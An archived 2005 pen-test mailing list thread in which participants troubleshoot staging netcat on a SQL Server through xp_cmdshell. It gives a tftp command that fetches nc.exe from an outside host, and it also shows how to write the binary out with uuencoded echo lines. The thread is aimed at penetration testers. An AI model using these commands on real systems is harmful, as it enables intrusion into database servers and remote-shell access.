Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: TFTP and XP_CMDSHELL - Weird - SOLVED

from [Andres Molinetti] Network Security [Permanent Link]
Subject: Re: TFTP and XP_CMDSHELL - Weird - SOLVED
Date: Fri, 24 Jun 2005 12:45:40 +0000 
I finnally worked it out.

The problem is the following:

SQL Server is running as a low-privileged account.

When you run a command with xp_cmdshell your working directory is "winnt\system32".
I was running "master.dbo.xp_cmdshell 'tftp -i myHost GET nc.exe c:\nc.exe" and it was failing.

The "bug" is that tftp client tries to create a temporary file when you start a download, and it does so in you WORKING DIRECTORY, not in the destination folder.
So you for the command to run properly you need to have write privileges in the destination folder AND IN THE WORKING DIRECTORY.

Now this works "master.dbo.xp_cmdshell 'cd c:\winnt\temp & tftp -i myHost GET nc.exe c:\nc.exe'".

Besides, it seems to be a good point to include in future SQL Injection Papers, because I haven't see this anywere before.

I don't know to call this a tftp client bug, but surely it's not a reasonable way of working.

Thank you all for the help,
cheers

Andy.


From: Javier Fernandez-Sanguino <jfernandez@germinus.com>
To: Andres Molinetti <andymolinetti@hotmail.com>
CC: pen-test@securityfocus.com
Subject: Re: TFTP and XP_CMDSHELL - Weird
Date: Thu, 23 Jun 2005 19:24:02 +0200

Andres Molinetti wrote:

I think the problem is the tftp client. Does anyone know if MS has fixed it in anyway not to allow downloads from low-privileged users?? or something like that??

Why use tftp? You can just create an uuencode file that will auto-decode itself when run. Try using

xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'
xp_cmdshell 'echo M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U >>c:\nc.com'
xp_cmdshell 'echo M+4Y%5%-%3D1?5C$N,#!?2E)4/0T*0T9&1E)8+&`L8#(D1CU`(70N<E$P)4EU >>c:\nc.com'
(...)

and so on. I'll leave the rest up to you. There are some caveats when you want to pull that through HTTP but it works everytime.

Regards

Javier


_________________________________________________________________
Acepta el reto MSN Premium: Correos más divertidos con fotos y textos increíbles en MSN Premium. Descárgalo y pruébalo 2 meses gratis. http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: Core Impact, Daniele Milan
Next by Date:  Re: sniffing/cracking wepkeys in FreeBSD, Nelson Murilo
Previous by Thread:  Re: TFTP and XP_CMDSHELL - Weird, Javier Fernandez-Sanguino
Next by Thread:  Re: TFTP and XP_CMDSHELL - Weird, Diego Kellner
Indexes:  [Date] [Thread] [Top] [All Lists]